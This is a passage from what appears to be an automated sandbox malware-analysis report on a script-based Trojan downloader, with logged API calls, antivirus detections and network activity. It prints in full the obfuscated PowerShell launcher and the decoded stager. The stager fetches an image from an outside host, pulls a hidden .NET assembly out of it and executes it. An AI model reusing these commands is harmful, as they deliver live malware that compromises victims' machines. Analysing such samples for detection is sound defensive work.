bRIwOvHbRIwOgvHbRIwOE8vHbRIwOawvHbRIwOwvHbRIwOGgvHbRIwOdvHbRIwOBtvHbRIwOGwvHbRIwOagBpvHbRIwOE8vHbRIwOawvHbRIwOwvHbRIwOCkvHbRIwOKQvHbRIwOnvHbRIwOCkvHbRIwOIvHbRIwOvHbRIwOtvHbRIwOHIvHbRIwOZQBQvHbRIwOGwvHbRIwOYQBjvHbRIwOGUvHbRIwOJwBPvHbRIwOGsvHbRIwOMvHbRIwOvHbRIwOnvHbRIwOCwvHbRIwOWwBDvHbRIwOGgvHbRIwOYQByvHbRIwOF0vHbRIwOMwvHbRIwO5vHbRIwOC0vHbRIwOQwBSvHbRIwOGUvHbRIwOUvHbRIwOBsvHbRIwOGEvHbRIwOYwBFvHbRIwOCvHbRIwOvHbRIwOIvHbRIwOvHbRIwOnvHbRIwOGIvHbRIwOdQvHbRIwOwvHbRIwOCcvHbRIwOLvHbRIwOBbvHbRIwOEMvHbRIwOavHbRIwOBhvHbRIwOHIvHbRIwOXQvHbRIwOzvHbRIwODYvHbRIwOIvHbRIwOvHbRIwOgvHbRIwOC0vHbRIwOcgBlvHbRIwOFvHbRIwOvHbRIwObvHbRIwOBhvHbRIwOGMvHbRIwOZQvHbRIwOnvHbRIwOG0vHbRIwOSwvHbRIwOzvHbRIwOCcvHbRIwOLvHbRIwOBbvHbRIwOEMvHbRIwOavHbRIwOBhvHbRIwOHIvHbRIwOXQvHbRIwO5vHbRIwODIvHbRIwOKQvHbRIwOgvHbRIwOHwvHbRIwOIvHbRIwOvHbRIwOuvHbRIwOCvHbRIwOvHbRIwOKvHbRIwOvHbRIwOgvHbRIwOCQvHbRIwORQBuvHbRIwOFYvHbRIwOOgBDvHbRIwOG8vHbRIwOTQBzvHbRIwOFvHbRIwOvHbRIwOZQBDvHbRIwOFsvHbRIwONvHbRIwOvHbRIwOsvHbRIwODIvHbRIwONvHbRIwOvHbRIwOsvHbRIwODIvHbRIwONQBdvHbRIwOC0vHbRIwOagBPvHbRIwOGkvHbRIwOTgvHbRIwOnvHbRIwOCcvHbRIwOKQvHbRIwO=';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('vHbRIwO','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002f8	1	1
ShellExecuteExW Dec. 8, 2023, 9:39 a.m.	show_type: 0 filepath_r: powershell parameters: -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('vHbRIwO','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD" filepath: powershell	1	1
CreateProcessInternalW Dec. 8, 2023, 9:39 a.m.	thread_identifier: 2204 thread_handle: 0x00000450 process_identifier: 2200 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('bu0imageUrl = Ok0https://uploaddei'+'magen'+'s.com.br/ima'+'ges/004/683/779/original/download.jpg?1701878864Ok0;bu0webClient = New-Object System.Net.WebClient;bu0imageBytes = bu0webCl'+'ient.DownloadData(bu0imageUrl);bu0imageText = [Sy'+'stem.Text.Encoding]::UTF8.GetString(bu0imageBytes);bu0startFlag = Ok0<<BASE64_START>>Ok0;bu0endFl'+'ag = Ok0<<BASE64_END>>Ok0;bu0startIndex = bu0imageText.IndexOf(bu0startFlag);bu0endIndex = '+'bu0imageText.IndexOf(bu0endF'+'lag);bu0sta'+'rtIndex -ge 0 -and bu0endIndex -gt bu0startIn'+'dex;bu0startIndex += bu0startFlag.Length;bu0base64Length = bu0endIndex - bu0startIndex;bu0base64Command = bu0imageText.S'+'ubstring(bu0sta'+'rtIndex, bu0'+'base64Length);bu0co'+'mmandBytes = [System.Convert]::FromBase64String'+'(bu0base64Command);bu0loadedAssembly = [Syst'+'em.Reflection.Assembly]::Load(bu0commandBytes);bu0type = bu0loadedAssembly.GetType(Ok0ClassL'+'ibrary3.Class1Ok0);bu0method = bu0type.GetMetho'+'d(Ok0RunOk0).Invoke(bu0null, [object[]] (Ok0dH'+'h0'+'Lk1HWi8wMDMvOC4zNC44MjIuNjYvLzpwdHRoOk0 , Ok0Ok0 , Ok02Ok0 , Ok0regas'+'mOk0 , Ok06Ok0 , Ok0C:mK3ProgramDatamK3Ok0, Ok0htmljiOk0))') -rePlace'Ok0',[Char]39-CRePlacE 'bu0',[Char]36 -rePlace'mK3',[Char]92) \| . ( $EnV:CoMsPeC[4,24,25]-jOiN'')" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 1 process_handle: 0x00000454	1	1

File has been identified by 4 AntiVirus engines on VirusTotal as malicious (4 events)

Symantec	CL.Downloader!gen11
Kaspersky	HEUR:Trojan.Script.Generic
Ikarus	Trojan.PS.Agent
Google	Detected

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Dec. 8, 2023, 9:39 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (11 events)

Data received	[
Data received	WereÊä.´bíÇ=¬GÈìÇ£¿î]ÝÙDOWNGRD ¾yö-¿»ÓûcmnE©µÍ¼ac{~¿SrMäs À ÿ
Data received	Q
Data received
Data received	AßÇE£Héx-Mòÿ¶ Sêèò¢aÌ-Ü3¤z_î¯ûzá",_ÃÝï<Ã±¦ã·×é\¹×6H0F!²ülzËK{&×¶ºñÌg/P}$M;$Îb!ÙÆ1ã >=¦ÕÐ¥nhu0RÃLò[åL=
Data received
Data received
Data received
Data received
Data received	0
Data received	÷ñXXØHÑ=ä§Èå#êM^äªZÌ$H;g£{ag´fÌ

Poweshell is sending data to a remote host (2 events)

Data sent	yuereÂÛ£«+b¿³Å*UWa³6.43aà}óÌ/5 ÀÀÀ À 284ÿuploaddeimagens.com.br
Data sent	FBA¢Tt%iùÖ1ÜÔB®MAi¡¡Åú*ÿÈ/÷¶ÃÔåpwë yÑW¸ö5MÙÉ;?+d8éh¥(~0[\|8cé¤ÿ[ ´èvX¿Ã÷îÇs2ÅÄ ãÊç·åoûÅº°khíøO

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Dec. 8, 2023, 9:39 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Dec. 8, 2023, 9:39 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (3 events)

Time & API	Arguments	Status	Return
send Dec. 8, 2023, 9:39 a.m.	buffer: yuereÂÛ£«+b¿³Å*UWa³6.43aà}óÌ/5 ÀÀÀ À 284ÿuploaddeimagens.com.br socket: 1444 sent: 126	1	126
send Dec. 8, 2023, 9:39 a.m.	buffer: FBA¢Tt%iùÖ1ÜÔB®MAi¡¡Åú*ÿÈ/÷¶ÃÔåpwë yÑW¸ö5MÙÉ;?+d8éh¥(~0[\|8cé¤ÿ[ ´èvX¿Ã÷îÇs2ÅÄ ãÊç·åoûÅº°khíøO socket: 1444 sent: 134	1	134
WSASend Dec. 8, 2023, 9:39 a.m.	buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com socket: 2020		0

One or more non-whitelisted processes were created (3 events)

parent_process	wscript.exe	martian_process	powershell -command "$Codigo = 'KvHbRIwOvHbRIwOovHbRIwOCcvHbRIwOYgB1vHbRIwODvHbRIwOvHbRIwOaQBtvHbRIwOGEvHbRIwOZwBlvHbRIwOFUvHbRIwOcgBsvHbRIwOCvHbRIwOvHbRIwOPQvHbRIwOgvHbRIwOE8vHbRIwOawvHbRIwOwvHbRIwOGgvHbRIwOdvHbRIwOB0vHbRIwOHvHbRIwOvHbRIwOcwvHbRIwO6vHbRIwOC8vHbRIwOLwB1vHbRIwOHvHbRIwOvHbRIwObvHbRIwOBvvHbRIwOGEvHbRIwOZvHbRIwOBkvHbRIwOGUvHbRIwOaQvHbRIwOnvHbRIwOCsvHbRIwOJwBtvHbRIwOGEvHbRIwOZwBlvHbRIwOG4vHbRIwOJwvHbRIwOrvHbRIwOCcvHbRIwOcwvHbRIwOuvHbRIwOGMvHbRIwObwBtvHbRIwOC4vHbRIwOYgByvHbRIwOC8vHbRIwOaQBtvHbRIwOGEvHbRIwOJwvHbRIwOrvHbRIwOCcvHbRIwOZwBlvHbRIwOHMvHbRIwOLwvHbRIwOwvHbRIwODvHbRIwOvHbRIwONvHbRIwOvHbRIwOvvHbRIwODYvHbRIwOOvHbRIwOvHbRIwOzvHbRIwOC8vHbRIwONwvHbRIwO3vHbRIwODkvHbRIwOLwBvvHbRIwOHIvHbRIwOaQBnvHbRIwOGkvHbRIwObgBhvHbRIwOGwvHbRIwOLwBkvHbRIwOG8vHbRIwOdwBuvHbRIwOGwvHbRIwObwBhvHbRIwOGQvHbRIwOLgBqvHbRIwOHvHbRIwOvHbRIwOZwvHbRIwO/vHbRIwODEvHbRIwONwvHbRIwOwvHbRIwODEvHbRIwOOvHbRIwOvHbRIwO3vHbRIwODgvHbRIwOOvHbRIwOvHbRIwO2vHbRIwODQvHbRIwOTwBrvHbRIwODvHbRIwOvHbRIwOOwBivHbRIwOHUvHbRIwOMvHbRIwOB3vHbRIwOGUvHbRIwOYgBDvHbRIwOGwvHbRIwOaQBlvHbRIwOG4vHbRIwOdv